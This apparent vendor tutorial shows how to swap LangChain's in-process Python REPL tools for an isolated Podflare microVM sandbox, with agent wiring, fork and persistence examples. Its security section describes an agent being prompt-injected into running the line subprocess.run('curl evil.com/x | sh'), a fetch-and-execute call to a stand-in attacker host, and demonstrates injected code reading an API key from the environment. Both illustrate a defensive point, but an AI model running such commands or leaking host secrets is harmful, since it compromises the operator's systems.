LangChain’s Tool primitive is clean, but the default code-execution tools (PythonREPLTool, PythonAstREPLTool) run inside your own Python process. That’s fine for development. For production agents running LLM-generated code, it’s a foot-gun — one prompt injection away from os.system-ing your server.
This post walks through replacing those in-process tools with a hardware-isolated Podflare sandbox, exposed to the agent as a standard LangChain structured tool. Full code that runs today and works with both LangGraph and the current LangChain AgentExecutor API.
Install
```shell
pip install langchain langchain-openai podflare
export OPENAI_API_KEY=sk-...
export PODFLARE_API_KEY=pf_live_...
```
The tool, using Podflare’s built-in helper
Podflare ships a LangChain adapter so you don’t have to write the StructuredTool boilerplate yourself. Import and go:
```python
from podflare import Sandbox
from podflare.langchain import PodflareTool

sb = Sandbox()

run_python = PodflareTool(
    sandbox=sb,
    name="run_python",
    description=(
        "Execute Python code in a persistent REPL. Variables, "
        "imports, and file state carry across calls. Returns "
        "stdout and stderr from the execution."
    ),
)
```

PodflareTool is a BaseTool-shaped wrapper that takes a single string argument, `code`, and returns the sandbox's stdout + stderr. Drop it into any LangChain agent like any other tool.
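The "state persists across calls" part of that description is the key contract. A useful mental model, in plain Python (this is a toy stand-in to illustrate the semantics, not Podflare's implementation): every call executes against the same shared namespace, so definitions from one call are visible in the next.

```python
import contextlib
import io


class ToyPersistentREPL:
    """Toy stand-in for a persistent REPL: every call executes
    against the same namespace dict, so state carries across calls."""

    def __init__(self):
        self.namespace = {}

    def run_code(self, code: str) -> str:
        buf = io.StringIO()
        with contextlib.redirect_stdout(buf):
            exec(code, self.namespace)  # same dict every call -> state persists
        return buf.getvalue()


repl = ToyPersistentREPL()
repl.run_code("import math; x = 2")          # first call defines state
out = repl.run_code("print(math.sqrt(x))")   # second call still sees `math` and `x`
```

The real sandbox gives you the same semantics, but the namespace lives in an isolated microVM instead of your process.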
Wire it into an agent
```python
from langchain_openai import ChatOpenAI
from langchain.agents import AgentExecutor, create_openai_tools_agent
from langchain_core.prompts import ChatPromptTemplate

llm = ChatOpenAI(model="gpt-5", temperature=0)

prompt = ChatPromptTemplate.from_messages([
    ("system",
     "You are a senior data scientist. You have access to a Python "
     "REPL. State persists across calls — variables and imports "
     "stick. Prefer using pandas + numpy over writing loops."),
    ("human", "{input}"),
    ("placeholder", "{agent_scratchpad}"),
])

agent = create_openai_tools_agent(llm, [run_python], prompt)
executor = AgentExecutor(agent=agent, tools=[run_python], verbose=True)

result = executor.invoke({
    "input":
        "Fetch the last 10 days of SPY close prices from Yahoo "
        "Finance. Compute daily returns. Tell me the standard "
        "deviation and whether it's higher than the 30-day average."
})
print(result["output"])

sb.close()
```

The agent will make roughly three tool calls: fetch the data, compute returns, compute stats. Between calls, the Python process stays alive inside the same Podflare sandbox, so pandas, numpy, the fetched data, and intermediate variables all persist in `globals()`.
Why this is more than a convenience
Three concrete wins over the default LangChain REPL tools:
1. Isolation — the model can’t hurt you
PythonREPLTool runs in your process. If the model gets prompt-injected into running subprocess.run("curl evil.com/x | sh"), that runs on your machine. With a Podflare sandbox, it runs in a disposable Podflare Pod microVM that can’t reach your host. See Why Docker isn’t enough for the full argument.
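To make the risk concrete, here is a toy demonstration (pure Python, no LangChain required) of what an in-process code tool effectively does with model output. Anything exec-ed in your process shares your interpreter's privileges, so injected code can read secrets straight out of `os.environ`:

```python
import os

# Pretend this is a secret your agent process holds.
os.environ["FAKE_API_KEY"] = "sk-not-a-real-key"

# What an in-process REPL tool effectively does with model-generated code:
injected = "leaked = __import__('os').environ.get('FAKE_API_KEY')"
scope = {}
exec(injected, scope)  # runs with the host process's full privileges

print(scope["leaked"])  # the "model" just read your key
```

Run the same string inside a microVM sandbox and the environment it reads is the sandbox's, not yours.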
2. Real pip install
The model can run !pip install scikit-learn inline (or declare it as part of the tool call) and have the library available on the next turn. Your host Python environment stays clean — all installs happen inside the sandbox.
3. Fork for parallel hypotheses
Tree-of-thought, multi-attempt code synthesis, and "try 5 approaches and take the best" patterns are one line on Podflare:
```python
children = parent.fork(n=5)  # ~80 ms server-side
results = [c.run_code(strategy) for c, strategy in zip(children, strategies)]
winner = pick_best(results)
parent.merge_into(winner)  # commit winner's state back to parent
for c in children:
    c.close()
```

LangChain's default REPL tool has no fork primitive — you'd have to spin up N processes and lose all the shared setup cost. Podflare's snapshot-based fork preserves the full Python state (imports, open files, loaded DataFrames) in every child.
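`pick_best` is left undefined above. One minimal way to write it — assuming, hypothetically, that each strategy prints a single numeric score and each run result exposes its stdout — sketched here with plain dicts standing in for sandbox results:

```python
def pick_best(results):
    """Return the result whose stdout parses as the highest score.
    Attempts that crashed (non-numeric stdout) score -inf and lose."""
    def score(r):
        try:
            return float(r["stdout"].strip())
        except (ValueError, KeyError):
            return float("-inf")
    return max(results, key=score)


# Plain dicts standing in for sandbox run results:
results = [
    {"stdout": "0.71\n"},
    {"stdout": "Traceback (most recent call last): ..."},  # a failed attempt
    {"stdout": "0.93\n"},
]
best = pick_best(results)
print(best["stdout"].strip())  # → 0.93
```

In practice your scoring function would be domain-specific — test pass rate, validation loss, whatever "best" means for the task.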
LangGraph-style long-running sessions
For LangGraph agents that run for hours or days, where you want to resume later with the same Python state, mark the sandbox persistent:
```python
# Day 1: create + load expensive state
sb = Sandbox(persistent=True)
sb.run_code("""
import pandas as pd
df = pd.read_parquet('/data/year.parquet')  # 2 GB
model = train_model(df)
""")
space_id = sb.space_id
sb.idle()  # freezes full VM memory to disk

# Day 2: resume — `df` and `model` are still in memory
sb = Sandbox.resume(space_id)
sb.run_code("model.predict(df.sample(10))")  # no retraining
```

What about LangGraph’s built-in state?
LangGraph’s checkpointer handles message history across runs. It doesn’t handle live Python process state — that’s where Podflare Spaces fits. They compose: use LangGraph checkpoints for the conversational state, and a Podflare persistent Sandbox for the execution state. Neither replaces the other.
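One way to wire the two together — hypothetical glue code, not a Podflare or LangGraph API — is a small registry mapping each LangGraph `thread_id` to the Space ID of its sandbox, so resuming a conversation also tells you which sandbox to resume:

```python
import json
import pathlib

# Hypothetical registry file; in production this would live in your DB.
REGISTRY = pathlib.Path("sandbox_registry.json")


def remember_space(thread_id: str, space_id: str) -> None:
    """Persist thread_id -> space_id so a resumed conversation
    can reattach to its sandbox."""
    table = json.loads(REGISTRY.read_text()) if REGISTRY.exists() else {}
    table[thread_id] = space_id
    REGISTRY.write_text(json.dumps(table))


def space_for(thread_id: str):
    """Look up the Space ID for a conversation thread, or None."""
    table = json.loads(REGISTRY.read_text()) if REGISTRY.exists() else {}
    return table.get(thread_id)


remember_space("thread-42", "space-abc123")
print(space_for("thread-42"))  # → space-abc123
```

On resume you'd call `Sandbox.resume(space_for(thread_id))` alongside invoking the graph with the same `thread_id`, and both halves of the state come back together.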
Performance
For chatty agents that make many small exec calls per turn, the hot-exec latency is what matters — and Podflare is ~46 ms p50 per call on an already-live sandbox. Compared with spinning up a Docker container per LangChain tool call (500–2000 ms), it’s an order of magnitude faster and less error-prone.
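The difference compounds because agent tool calls are sequential. Back-of-envelope, for a turn that makes 15 exec calls (using the ~46 ms hot-exec p50 above and a conservative 1 s per fresh Docker container — both assumptions for illustration):

```python
calls_per_turn = 15
podflare_p50_s = 0.046  # ~46 ms hot-exec p50, from the numbers above
docker_cold_s = 1.0     # conservative per-container spin-up estimate

podflare_turn = calls_per_turn * podflare_p50_s   # 0.69 s
docker_turn = calls_per_turn * docker_cold_s      # 15.0 s

print(f"Podflare:        {podflare_turn:.2f} s/turn")
print(f"Docker-per-call: {docker_turn:.1f} s/turn")
```

At 15 calls the gap is roughly 20x, and the user feels it as sub-second responsiveness versus a quarter-minute stall.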
Try it
Sign up for a free Podflare account ($200 starter credit). The full working LangChain example is in PodFlare-ai/demo. Takes under a minute to go from a clean pip env to a LangChain agent running real code in a microVM.